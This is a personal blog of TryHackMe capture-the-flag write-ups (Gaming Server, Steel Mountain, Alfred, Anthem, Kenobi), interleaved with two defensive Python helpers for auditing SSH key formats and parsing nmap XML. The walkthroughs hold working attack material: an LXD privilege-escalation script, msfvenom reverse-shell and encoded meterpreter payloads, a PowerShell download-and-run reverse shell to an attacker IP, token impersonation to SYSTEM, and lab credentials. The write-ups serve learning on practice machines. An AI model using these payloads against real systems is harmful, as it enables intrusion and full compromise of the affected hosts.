sk18um

Notes on life, from a person who enjoys constantly learning.

THM - Gaming Server

Gaming Server

skibum 8/30/2020

Enumeration

  1. nmap scan
sudo nmap -sS -sC -O <Machine_IP>                                     
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-30 21:26 CDT
Nmap scan report for <Machine_IP>
Host is up (0.20s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
| ssh-hostkey: 
|   2048 34:0e:fe:06:12:67:3e:a4:eb:ab:7a:c4:81:6d:fe:a9 (RSA)
|   256 49:61:1e:f4:52:6e:7b:29:98:db:30:2d:16:ed:f4:8b (ECDSA)
|_  256 b8:60:c4:5b:b7:b2:d0:23:a0:c7:56:59:5c:63:1e:c4 (ED25519)
80/tcp open  http
|_http-title: House of danak
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=8/30%OT=22%CT=1%CU=40971%PV=Y%DS=4%DC=I%G=Y%TM=5F4C601
OS:2%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M509ST11NW7%O2=M509ST11NW7%O3=M509NNT11NW7%O4=M509ST11NW7%O5=M509ST1
OS:1NW7%O6=M509ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN
OS:(R=Y%DF=Y%T=40%W=F507%O=M509NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 4 hops

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.31 seconds
  2. There are two ports open: one is an HTTP server and the other is SSH. Let's start with the HTTP server.

2.1. Check over http server

wfuzz -w /usr/share/dirb/wordlists/big.txt -u "http://<Machine-IP>/FUZZ" --hc 404 -c
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://<Machine-IP>/FUZZ
Total requests: 20469

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                    
===================================================================

000000015:   403        9 L      28 W     276 Ch      ".htaccess"                                                                
000000016:   403        9 L      28 W     276 Ch      ".htpasswd"                                                                
000015551:   200        3 L      5 W      33 Ch       "robots.txt"                                                               
000016077:   301        9 L      28 W     311 Ch      "secret"                                                                   
000016215:   403        9 L      28 W     276 Ch      "server-status"                                                            
000018777:   301        9 L      28 W     312 Ch      "uploads"                                                                  

Total time: 562.5507
Processed Requests: 20469
Filtered Requests: 20463
Requests/sec.: 36.38605

2.2. Look over the robots.txt

user-agent: *
Allow: /
/uploads/

2.3. Now let's check out http://<Machine-IP>/uploads

  • There is a cracking password dictionary there and a hacker manifesto.

2.4. Now let's check out the secret folder http://<Machine-IP>/secret

  • There is a secret key in the folder (RSA private key):

```
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,82823EE792E75948EE2DE731AF1A0547
[key body omitted]
-----END RSA PRIVATE KEY-----
```

3. When attempting to use the id_rsa key it asks for a password. (Not sure if the usernames are correct.)

4. Crack the SSH key password using John the Ripper: the password is `letmein`

5. Now `ssh -i secretkey john@<Machine-IP>` into the box to get the user.txt flag
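The key under /secret is a legacy PEM key (Proc-Type: 4,ENCRYPTED, DEK-Info: AES-128-CBC), which is why John gets through the passphrase so quickly: that container stretches the passphrase with a single MD5 round, whereas the OpenSSH key format uses bcrypt with a configurable round count. As an added example (not part of this write-up), the Python below classifies a private key by its container format and key-derivation settings so an audit of a web root or repository can flag keys that need regenerating. The legacy sample copies the page's headers with the body omitted; the OpenSSH-format sample is constructed in code from the header fields only (magic, cipher, KDF, KDF options, key count) and carries no key material.

```python
import base64
import struct

# Constructed sample, modelled on the header of the encrypted key found under /secret
# (only the PEM headers matter for classification; the key body is omitted).
LEGACY_PEM = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,82823EE792E75948EE2DE731AF1A0547

(base64 key body omitted in this constructed sample)
-----END RSA PRIVATE KEY-----
"""


def _ssh_string(data: bytes) -> bytes:
    """SSH wire-format string: 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


def _read_ssh_string(buf: bytes, off: int):
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def build_openssh_header(cipher=b"aes256-ctr", kdf=b"bcrypt", rounds=16) -> str:
    """Constructed sample: the leading fields of an 'openssh-key-v1' blob as ssh-keygen
    writes them (magic, ciphername, kdfname, kdfoptions, key count); no key material follows."""
    kdfoptions = b""
    if kdf == b"bcrypt":
        kdfoptions = _ssh_string(b"\x00" * 16) + struct.pack(">I", rounds)  # salt, rounds
    blob = (b"openssh-key-v1\x00" + _ssh_string(cipher) + _ssh_string(kdf)
            + _ssh_string(kdfoptions) + struct.pack(">I", 1))
    body = base64.encodebytes(blob).decode()
    return "-----BEGIN OPENSSH PRIVATE KEY-----\n" + body + "-----END OPENSSH PRIVATE KEY-----\n"


def classify_private_key(pem: str) -> dict:
    """Report container format, whether the key is encrypted, and how the passphrase is
    stretched: legacy PEM uses EVP_BytesToKey (one MD5 round), OpenSSH format uses bcrypt."""
    lines = [l.strip() for l in pem.strip().splitlines()]
    if len(lines) < 2 or not lines[0].startswith("-----BEGIN ") or not lines[-1].startswith("-----END "):
        raise ValueError("not a PEM-armoured key")
    label = lines[0][len("-----BEGIN "):-len("-----")]
    if label == "OPENSSH PRIVATE KEY":
        blob = base64.b64decode("".join(lines[1:-1]))
        magic = b"openssh-key-v1\x00"
        if not blob.startswith(magic):
            raise ValueError("bad openssh-key-v1 magic")
        cipher, off = _read_ssh_string(blob, len(magic))
        kdf, off = _read_ssh_string(blob, off)
        kdfoptions, off = _read_ssh_string(blob, off)
        if kdf == b"none":
            return {"format": "openssh", "encrypted": False, "cipher": None, "kdf": None, "rounds": 0}
        _salt, o = _read_ssh_string(kdfoptions, 0)
        (rounds,) = struct.unpack(">I", kdfoptions[o:o + 4])
        return {"format": "openssh", "encrypted": True, "cipher": cipher.decode(),
                "kdf": kdf.decode(), "rounds": rounds}
    # Legacy PEM: RFC 1421-style headers, a blank line, then the base64 body.
    headers = {}
    for line in lines[1:-1]:
        if not line:
            break
        key, sep, value = line.partition(":")
        if sep:
            headers[key.strip()] = value.strip()
    if headers.get("Proc-Type") == "4,ENCRYPTED" and "DEK-Info" in headers:
        cipher = headers["DEK-Info"].split(",")[0]
        return {"format": "legacy-pem", "encrypted": True, "cipher": cipher,
                "kdf": "EVP_BytesToKey-MD5", "rounds": 1}
    return {"format": "legacy-pem", "encrypted": False, "cipher": None, "kdf": None, "rounds": 0}


def assess(info: dict) -> str:
    """One-line verdict for an audit report."""
    if not info["encrypted"]:
        return "unencrypted private key: anyone who can read the file can use it"
    if info["format"] == "legacy-pem":
        return "legacy PEM encryption: single MD5 round, so a weak passphrase falls to john/hashcat quickly"
    if info["rounds"] < 16:
        return "openssh format but low bcrypt rounds (%d)" % info["rounds"]
    return "openssh format with bcrypt rounds=%d: passphrase guessing is slow" % info["rounds"]


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:] or []:
        with open(path) as fh:
            info = classify_private_key(fh.read())
        print(path, info, "->", assess(info))
    print("sample:", assess(classify_private_key(LEGACY_PEM)))
```

Run it over a directory of keys to find the ones that look like the Gaming Server key. To move a legacy key to the stronger container, `ssh-keygen -p -o -a 100 -f <keyfile>` rewrites it in OpenSSH format with 100 bcrypt rounds; and a private key, encrypted or not, has no business in a web-served directory in the first place.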

## Possible Creds

From the pages, the names that stand out are "The Mentor" and Beaker (from a reverse image search).
- [ ] The Mentor
- [ ] Beaker
- [x] John, from a comment in the HTML. This is the correct username.

## Priv Esc
1. Run linpeas.sh to see possible methods of attack for gaining higher privileges.
    1. LXD shows up as a method of attack.
2. Review the method using searchsploit. The script it returns (LXD privilege escalation):
```bash
#!/usr/bin/env bash

# ----------------------------------
# Authors: Marcelo Vazquez (S4vitar)
#          Victor Lasa      (vowkin)
# ----------------------------------

# Step 1: Download build-alpine => wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine [Attacker Machine]
# Step 2: Build alpine => bash build-alpine (as root user) [Attacker Machine]
# Step 3: Run this script and you will get root [Victim Machine]
# Step 4: Once inside the container, navigate to /mnt/root to see all resources from the host machine

function helpPanel(){
  echo -e "\nUsage:"
  echo -e "\t[-f] Filename (.tar.gz alpine file)"
  echo -e "\t[-h] Show this help panel\n"
  exit 1
}

function createContainer(){
  lxc image import $filename --alias alpine && lxd init --auto
  echo -e "[*] Listing images...\n" && lxc image list
  lxc init alpine privesc -c security.privileged=true
  lxc config device add privesc giveMeRoot disk source=/ path=/mnt/root recursive=true
  lxc start privesc
  lxc exec privesc sh
  cleanup
}

function cleanup(){
  echo -en "\n[*] Removing container..."
  lxc stop privesc && lxc delete privesc && lxc image delete alpine
  echo " [√]"
}

set -o nounset
set -o errexit

# -h takes no argument, so its getopts spec has no trailing colon
declare -i parameter_enable=0; while getopts ":f:h" arg; do
  case $arg in
    f) filename=$OPTARG && let parameter_enable+=1;;
    h) helpPanel;;
  esac
done

if [ $parameter_enable -ne 1 ]; then
  helpPanel
else
  createContainer
fi
```
3. Follow the procedure in the method of attack for Ubuntu 18.04:
    1. `lxc image import ./alpine-v3.12-x86_64-20200905_1639.tar.gz --alias myimage`
    2. `lxc init myimage ignite -c security.privileged=true`
    3. `lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true`
    4. `lxc start ignite`
    5. `lxc exec ignite /bin/sh`

P0wn3d!!

  1. Now we have a root shell. P0wn3d!! Find the flag under /mnt/root/root/root.txt

THM - Steel Mountain

Steel Mountain

skibum 8/29/2020

Exploit

  1. Scan and save to an XML file for searchsploit. The interesting ports from the XML:

    <port protocol="tcp" portid="80">
      <state state="open" reason="syn-ack" reason_ttl="125"/>
      <service name="http" product="Microsoft IIS httpd" version="8.5" ostype="Windows" method="probed" conf="10">
        <cpe>cpe:/a:microsoft:iis:8.5</cpe><cpe>cpe:/o:microsoft:windows</cpe>
      </service>
      <script id="http-methods" output="&#xa; Potentially risky methods: TRACE">
        <table key="Potentially risky methods"><elem>TRACE</elem></table>
      </script>
      <script id="http-server-header" output="Microsoft-IIS/8.5">
        <elem>Microsoft-IIS/8.5</elem>
      </script>
      <script id="http-title" output="Site doesn&apos;t have a title (text/html)."></script>
    </port>
    <port protocol="tcp" portid="445">
      <state state="open" reason="syn-ack" reason_ttl="125"/>
      <service name="microsoft-ds" product="Microsoft Windows Server 2008 R2 - 2012 microsoft-ds" ostype="Windows Server 2008 R2 - 2012" method="probed" conf="10">
        <cpe>cpe:/o:microsoft:windows</cpe>
      </service>
    </port>
    <port protocol="tcp" portid="8080">
      <state state="open" reason="syn-ack" reason_ttl="125"/>
      <service name="http" product="HttpFileServer httpd" version="2.3" ostype="Windows" method="probed" conf="10">
        <cpe>cpe:/a:rejetto:httpfileserver:2.3</cpe>
        <cpe>cpe:/o:microsoft:windows</cpe>
      </service>
      <script id="http-server-header" output="HFS 2.3">
        <elem>HFS 2.3</elem>
      </script>
      <script id="http-title" output="HFS /">
        <elem key="title">HFS /</elem>
      </script>
    </port>

  2. Since Rejetto stands out, use searchsploit to list exploits for it
searchsploit rejetto http 2.3
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                                                                                  |  Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload                                                                                                                                                                                                  | multiple/remote/30850.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)                                                                                                                                                                                             | windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)                                                                                                                                                                                             | windows/remote/39161.py
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution                                                                                                                                                                                        | windows/webapps/34852.txt
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
  3. Review and copy the python exploit
    3.1. Modify this file to have the proper IP and the port that will be used
  4. Copy (cp) the nc.exe file from SecLists to the active pwd
  5. Start a python http server: `python -m SimpleHTTPServer 80`
  6. Create a netcat session: `nc -nlvp 9001`
  7. Run the exploit: `python 39161.py <$IP> 8080`
    7.1. Note that this will need to be run 2+ times to open the nc session
  8. Find the user.txt under c:\Users\bill\Desktop
  9. Copy winPEAS over and run it to find a priv esc
    9.1. Advanced System Care Service 9 is exploitable
  10. Create a reverse shell for the Advanced.exe file: `msfvenom -p windows/shell_reverse_tcp LHOST=10.13.2.170 LPORT=9002 -f exe -o Advanced.exe`
  11. Open a second netcat session: `nc -nlvp 9002`
  12. Download the file to c:\Program Files (x86)\IObit using `powershell -c wget "http://10.11.1.198/Advanced.exe" -outfile Advanced.exe`
  13. Run the exploit
    13.1. `sc stop AdvancedSystemCareService9`
    13.2. `sc start AdvancedSystemCareService9`
  14. P0wn3d !!! now get the root flag at c:\Users\Administrator\Desktop
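Step 1 saves the scan as XML precisely so the service banners and CPEs can be fed to searchsploit, and step 2 does that by hand for the one product that stood out. As an added example (not part of this write-up), the Python below does the same triage over the whole file: it reads the `-oX` output, keeps the open ports with their product, version, CPE list and NSE script output, and turns each application CPE into a searchsploit query while also surfacing the risky HTTP methods the http-methods script reported. The sample is the page's own three `<port>` elements wrapped in a root element so the fragment parses stand-alone; a real file (root `<nmaprun>`) is read from the path given on the command line.

```python
import re
import sys
import xml.etree.ElementTree as ET

# Constructed sample: the three <port> elements from the -oX scan above, wrapped in a
# root element so the fragment parses on its own (a full nmap file nests them under
# <nmaprun>/<host>/<ports>, which root.iter("port") also handles).
SAMPLE_XML = """<ports>
<port protocol="tcp" portid="80">
  <state state="open" reason="syn-ack" reason_ttl="125"/>
  <service name="http" product="Microsoft IIS httpd" version="8.5" ostype="Windows" method="probed" conf="10">
    <cpe>cpe:/a:microsoft:iis:8.5</cpe><cpe>cpe:/o:microsoft:windows</cpe>
  </service>
  <script id="http-methods" output="&#xa; Potentially risky methods: TRACE">
    <table key="Potentially risky methods"><elem>TRACE</elem></table>
  </script>
  <script id="http-server-header" output="Microsoft-IIS/8.5"><elem>Microsoft-IIS/8.5</elem></script>
  <script id="http-title" output="Site doesn&apos;t have a title (text/html)."></script>
</port>
<port protocol="tcp" portid="445">
  <state state="open" reason="syn-ack" reason_ttl="125"/>
  <service name="microsoft-ds" product="Microsoft Windows Server 2008 R2 - 2012 microsoft-ds" ostype="Windows Server 2008 R2 - 2012" method="probed" conf="10">
    <cpe>cpe:/o:microsoft:windows</cpe>
  </service>
</port>
<port protocol="tcp" portid="8080">
  <state state="open" reason="syn-ack" reason_ttl="125"/>
  <service name="http" product="HttpFileServer httpd" version="2.3" ostype="Windows" method="probed" conf="10">
    <cpe>cpe:/a:rejetto:httpfileserver:2.3</cpe>
    <cpe>cpe:/o:microsoft:windows</cpe>
  </service>
  <script id="http-server-header" output="HFS 2.3"><elem>HFS 2.3</elem></script>
  <script id="http-title" output="HFS /"><elem key="title">HFS /</elem></script>
</port>
</ports>
"""


def parse_ports(xml_text: str) -> list:
    """Return one dict per open port: service banner fields, CPEs and NSE script output."""
    root = ET.fromstring(xml_text)
    inventory = []
    for port in root.iter("port"):
        state = port.find("state")
        if state is None or state.get("state") != "open":
            continue
        svc = port.find("service")
        inventory.append({
            "port": int(port.get("portid")),
            "proto": port.get("protocol"),
            "service": svc.get("name") if svc is not None else None,
            "product": svc.get("product") if svc is not None else None,
            "version": svc.get("version") if svc is not None else None,
            "cpes": [c.text for c in svc.iter("cpe")] if svc is not None else [],
            # NSE stores multi-line output in the attribute; strip the leading newline
            "scripts": {s.get("id"): (s.get("output") or "").strip() for s in port.findall("script")},
        })
    return inventory


def searchsploit_terms(entry: dict) -> list:
    """Turn application CPEs (cpe:/a:vendor:product:version) into searchsploit queries.
    OS CPEs (cpe:/o:...) are skipped: they name the platform, not an exploitable service."""
    terms = []
    for cpe in entry["cpes"]:
        parts = cpe.split(":")
        if len(parts) >= 4 and parts[1] == "/a":
            terms.append(" ".join(p for p in parts[2:5] if p))
    return terms


def risky_http_methods(entry: dict) -> list:
    """Methods the http-methods script flagged (TRACE here, a cross-site tracing risk)."""
    m = re.search(r"Potentially risky methods:\s*(.+)", entry["scripts"].get("http-methods", ""))
    return m.group(1).split() if m else []


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_XML
    for e in parse_ports(text):
        banner = f"{e['port']}/{e['proto']} {e['product']} {e['version'] or ''}".rstrip()
        print(banner, "| searchsploit:", searchsploit_terms(e) or "-",
              "| risky methods:", risky_http_methods(e) or "-")
```

On the sample this yields `rejetto httpfileserver 2.3` for port 8080 (the query step 2 runs) and nothing for 445, whose only CPE is the OS. The same inventory is what a defender diffs against an approved-service list: a file server on 8080 with a version that has public exploits is a finding before anyone runs searchsploit.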

THM - Alfred

Alfred

skibum 8/30/2020

Enumeration and initial shell

  1. NMAP scan

    nmap -sV -sT -Pn -oX nmap/intial <Machine_IP>
    
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-30 16:06 CDT
    Nmap scan report for <Machine_IP>
    Host is up (0.22s latency).
    Not shown: 997 filtered ports
    PORT     STATE SERVICE            VERSION
    80/tcp   open  http               Microsoft IIS httpd 7.5
    3389/tcp open  ssl/ms-wbt-server?
    8080/tcp open  http               Jetty 9.4.z-SNAPSHOT
    Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 36.91 seconds
    
  2. There are two ports with web servers on them
    2.1. Port 80 just contains a RIP for Bruce Wayne
    2.2. Port 8080 is a login for Jenkins

  3. Check for default login values.
    Test username:Password as admin:admin

    • This worked to grant us access.
  4. From the main menu select the project in the center > select Configure; this allows you to modify the command that gets run on the underlying system:

    powershell iex (New-Object Net.WebClient).DownloadString('http://10.13.2.170:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.13.2.170 -Port 1337
    
  5. Run a python3 -m http.server and nc -nlvp 1337 before building the project.

  6. A user shell is now available.

Priv esc

  1. Generate a meterpreter shell

    msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.13.2.170 LPORT=9001 -f exe -o knockknock.exe  
    
  2. Download to the shell

    powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.13.2.170:8000/knockknock.exe','knockknock.exe')" 
    
  3. Set the multi handler with the windows/meterpreter/reverse_tcp payload

  4. Run the exploit on the msfconsole and then run the exe on the shell.

  5. With the meterpreter shell up, check the privileges.

    PS> whoami /priv
    PRIVILEGES INFORMATION
    ----------------------
    
    Privilege Name                  Description                               State   
    =============================== ========================================= ========
    SeIncreaseQuotaPrivilege        Adjust memory quotas for a process        Disabled
    SeSecurityPrivilege             Manage auditing and security log          Disabled
    SeTakeOwnershipPrivilege        Take ownership of files or other objects  Disabled
    SeLoadDriverPrivilege           Load and unload device drivers            Disabled
    SeSystemProfilePrivilege        Profile system performance                Disabled
    SeSystemtimePrivilege           Change the system time                    Disabled
    SeProfileSingleProcessPrivilege Profile single process                    Disabled
    SeIncreaseBasePriorityPrivilege Increase scheduling priority              Disabled
    SeCreatePagefilePrivilege       Create a pagefile                         Disabled
    SeBackupPrivilege               Back up files and directories             Disabled
    SeRestorePrivilege              Restore files and directories             Disabled
    SeShutdownPrivilege             Shut down the system                      Disabled
    SeDebugPrivilege                Debug programs                            Enabled 
    SeSystemEnvironmentPrivilege    Modify firmware environment values        Disabled
    SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled 
    SeRemoteShutdownPrivilege       Force shutdown from a remote system       Disabled
    SeUndockPrivilege               Remove computer from docking station      Disabled
    SeManageVolumePrivilege         Perform volume maintenance tasks          Disabled
    SeImpersonatePrivilege          Impersonate a client after authentication Enabled 
    SeCreateGlobalPrivilege         Create global objects                     Enabled 
    SeIncreaseWorkingSetPrivilege   Increase a process working set            Disabled
    SeTimeZonePrivilege             Change the time zone                      Disabled
    SeCreateSymbolicLinkPrivilege   Create symbolic links                     Disabled
    
  6. As SeImpersonatePrivilege is enabled, let's try to impersonate a token. Load the incognito module in the meterpreter session (`load incognito`).

  7. Let's list the tokens

    list_tokens -g
    [-] Warning: Not currently running as SYSTEM, not all tokens will be available
                 Call rev2self if primary process token is SYSTEM
    
    Delegation Tokens Available
    ========================================
    \
    BUILTIN\Administrators
    BUILTIN\IIS_IUSRS
    BUILTIN\Users
    NT AUTHORITY\Authenticated Users
    NT AUTHORITY\NTLM Authentication
    NT AUTHORITY\SERVICE
    NT AUTHORITY\This Organization
    NT AUTHORITY\WRITE RESTRICTED
    NT SERVICE\AppHostSvc
    NT SERVICE\AudioEndpointBuilder
    NT SERVICE\BFE
    NT SERVICE\CertPropSvc
    NT SERVICE\CscService
    NT SERVICE\Dnscache
    NT SERVICE\eventlog
    NT SERVICE\EventSystem
    NT SERVICE\FDResPub
    NT SERVICE\iphlpsvc
    NT SERVICE\LanmanServer
    NT SERVICE\MMCSS
    NT SERVICE\PcaSvc
    NT SERVICE\PlugPlay
    NT SERVICE\RpcEptMapper
    NT SERVICE\Schedule
    NT SERVICE\SENS
    NT SERVICE\SessionEnv
    NT SERVICE\Spooler
    NT SERVICE\TrkWks
    NT SERVICE\UmRdpService
    NT SERVICE\UxSms
    NT SERVICE\WdiSystemHost
    NT SERVICE\Winmgmt
    NT SERVICE\WSearch
    NT SERVICE\wuauserv
    
    Impersonation Tokens Available
    ========================================
    NT AUTHORITY\NETWORK
    NT SERVICE\AudioSrv
    NT SERVICE\CryptSvc
    NT SERVICE\DcomLaunch
    NT SERVICE\Dhcp
    NT SERVICE\DPS
    NT SERVICE\LanmanWorkstation
    NT SERVICE\lmhosts
    NT SERVICE\MpsSvc
    NT SERVICE\netprofm
    NT SERVICE\nsi
    NT SERVICE\PolicyAgent
    NT SERVICE\Power
    NT SERVICE\ShellHWDetection
    NT SERVICE\W32Time
    NT SERVICE\WdiServiceHost
    NT SERVICE\WinHttpAutoProxySvc
    NT SERVICE\wscsvc
    
  8. Since BUILTIN\Administrators is available, let's try to impersonate it: `impersonate_token "BUILTIN\Administrators"`

  9. We are now NT AUTHORITY\SYSTEM; let's migrate into a SYSTEM process to make sure we keep it.

  10. Use the `ps` command to list the processes and check for the services.exe process. It was 668!

  11. Now let's migrate: `migrate 668`

  12. P0wn3d!!! now read the root.txt file at C:\Windows\System32\config

THM - Anthem

Anthem

skibum 8/20/20

Initial IP: BOX_IP = 10.10.42.63

Recon

sudo nmap -sS -sV -sC BOX_IP

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-20 07:11 CDT
Nmap scan report for BOX_IP
Host is up (0.20s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-robots.txt: 4 disallowed entries 
|_/bin/ /config/ /umbraco/ /umbraco_client/
|_http-title: Anthem.com - Welcome to our blog
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: WIN-LU09299160F
|   NetBIOS_Domain_Name: WIN-LU09299160F
|   NetBIOS_Computer_Name: WIN-LU09299160F
|   DNS_Domain_Name: WIN-LU09299160F
|   DNS_Computer_Name: WIN-LU09299160F
|   Product_Version: 10.0.17763
|_  System_Time: 2020-08-20T12:12:02+00:00
| ssl-cert: Subject: commonName=WIN-LU09299160F
| Not valid before: 2020-04-04T22:56:38
|_Not valid after:  2020-10-04T22:56:38
|_ssl-date: 2020-08-20T12:12:11+00:00; 0s from scanner time.

No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=8/20%OT=80%CT=1%CU=39280%PV=Y%DS=4%DC=T%G=Y%TM=5F3E689
OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10C%TI=I%CI=I%II=I%SS=S%TS=
OS:U)SEQ(SP=107%GCD=1%ISR=10C%CI=I%II=I%TS=U)OPS(O1=M509NW8NNS%O2=M509NW8NN
OS:S%O3=M509NW8%O4=M509NW8NNS%O5=M509NW8NNS%O6=M509NNS)WIN(W1=FFFF%W2=FFFF%
OS:W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M509NW8NNS%CC
OS:=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=
OS:S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF
OS:=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=
OS:%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=
OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RI
OS:PCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 4 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-08-20T12:12:02
|_  start_date: N/A

Creds

user

  • Name: Solomon Grundy
    • Note this is found by searching the poem on the website.
  • Email: SG@anthem.com
  • Possible Password: UmbracoIsTheBest! (Found on the robots.txt page)

admin

  • Name: Administrator
  • Password: ChangeMeBaby1MoreTime (Found on a backup text file.)

Interesting Information

  • RPC open on port 135
  • ms-wbt-server (Terminal Services) open on port 3389

  • Note that RDP is up on the machine.

THM - Kenobi

Kenobi

skibum 8/29/2020

Recon

NMAP scans

  1. Scan for open ports and understand what is available.

    nmap -A -oN nmap/FullScan <Machine_IP> 
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-29 06:56 CDT
    Nmap scan report for <Machine_IP> 
    Host is up (0.20s latency).
    Not shown: 990 closed ports
    PORT     STATE    SERVICE       VERSION
    21/tcp   open     ftp           ProFTPD 1.3.5
    22/tcp   open     ssh           OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
    |   256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
    |_  256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
    80/tcp   open     http          Apache httpd 2.4.18 ((Ubuntu))
    | http-robots.txt: 1 disallowed entry 
    |_/admin.html
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    |_http-title: Site doesn't have a title (text/html).
    111/tcp  open     rpcbind       2-4 (RPC #100000)
    | rpcinfo: 
    |   program version    port/proto  service
    |   100000  2,3,4        111/tcp   rpcbind
    |   100000  2,3,4        111/udp   rpcbind
    |   100000  3,4          111/tcp6  rpcbind
    |   100000  3,4          111/udp6  rpcbind
    |   100003  2,3,4       2049/tcp   nfs
    |   100003  2,3,4       2049/tcp6  nfs
    |   100003  2,3,4       2049/udp   nfs
    |   100003  2,3,4       2049/udp6  nfs
    |   100005  1,2,3      36173/udp   mountd
    |   100005  1,2,3      38913/tcp6  mountd
    |   100005  1,2,3      43825/udp6  mountd
    |   100005  1,2,3      44273/tcp   mountd
    |   100021  1,3,4      37709/tcp   nlockmgr
    |   100021  1,3,4      44971/tcp6  nlockmgr
    |   100021  1,3,4      46911/udp   nlockmgr
    |   100021  1,3,4      49498/udp6  nlockmgr
    |   100227  2,3         2049/tcp   nfs_acl
    |   100227  2,3         2049/tcp6  nfs_acl
    |   100227  2,3         2049/udp   nfs_acl
    |_  100227  2,3         2049/udp6  nfs_acl
    139/tcp  open     netbios-ssn   Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp  open     netbios-ssn   Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
    1666/tcp filtered netview-aix-6
    1801/tcp filtered msmq
    2049/tcp filtered nfs
    3703/tcp filtered adobeserver-3
    Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
    
    Host script results:
